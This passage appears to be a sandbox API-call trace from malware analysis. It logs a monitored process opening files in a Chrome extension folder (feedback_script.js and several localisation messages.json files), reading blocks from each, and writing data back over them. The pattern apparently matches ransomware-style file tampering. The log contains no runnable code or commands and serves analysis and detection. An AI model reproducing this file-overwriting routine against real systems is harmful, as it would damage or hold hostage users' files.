dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x828 [0169.835] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.835] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.835] ReleaseMutex (hMutex=0x168) returned 1 [0169.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.html", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0169.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index.html", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="index.html", lpUsedDefaultChar=0x0) returned 10 [0169.835] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840958, nNumberOfBytesToRead=0x828, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesRead=0x311f2bc*=0x828, lpOverlapped=0x0) returned 1 [0169.837] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0169.837] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f2d0*=0xdb0, lpOverlapped=0x0) returned 1 [0169.838] CloseHandle (hObject=0x1d8) returned 1 [0169.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0169.839] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.839] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2b20 [0169.839] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.839] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.840] ReleaseMutex (hMutex=0x168) returned 1 [0169.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feedback_script.js", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0169.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feedback_script.js", cchWideChar=18, lpMultiByteStr=0x1f88bcc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feedback_script.js", lpUsedDefaultChar=0x0) returned 18 [0169.840] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.841] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b20 [0169.842] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.842] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1b20 [0169.843] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0169.843] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0169.844] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0169.844] CloseHandle (hObject=0x1d8) returned 1 [0169.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0169.845] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.845] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x45bf [0169.845] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.845] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.845] ReleaseMutex (hMutex=0x168) returned 1 [0169.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.845] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.847] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x35bf [0169.848] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.849] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x35bf [0169.849] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0169.849] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0169.849] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0169.849] CloseHandle (hObject=0x1d8) returned 1 [0169.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0169.851] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.851] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3d7a [0169.851] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.852] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.852] ReleaseMutex (hMutex=0x168) returned 1 [0169.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.852] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.854] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2d7a [0169.854] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.855] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2d7a [0169.855] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0169.856] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0169.856] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0169.856] CloseHandle (hObject=0x1d8) returned 1 [0169.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0169.858] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.858] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x50f7 [0169.858] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.858] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.858] ReleaseMutex (hMutex=0x168) returned 1 [0169.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.858] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.860] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x40f7 [0169.860] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0169.861] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x40f7 [0169.861] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0169.862] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0169.862] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0169.862] CloseHandle (hObject=0x1d8) returned 1 [0169.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0169.863] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.863] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x403a [0169.863] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0169.863] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0169.863] ReleaseMutex (hMutex=0x168) returned 1 [0169.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0169.864] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.776] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x303a [0170.777] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.778] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x303a [0170.778] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0170.779] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0170.779] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0170.779] CloseHandle (hObject=0x1d8) returned 1 [0170.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.780] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.781] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3fd7 [0170.781] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.781] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.781] ReleaseMutex (hMutex=0x168) returned 1 [0170.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.781] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.783] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2fd7 [0170.783] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.784] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2fd7 [0170.784] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0170.785] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0170.785] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0170.785] CloseHandle (hObject=0x1d8) returned 1 [0170.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.787] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.787] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x49c1 [0170.787] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.787] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.788] ReleaseMutex (hMutex=0x168) returned 1 [0170.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.788] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.790] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x39c1 [0170.790] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.791] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x39c1 [0170.791] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0170.791] 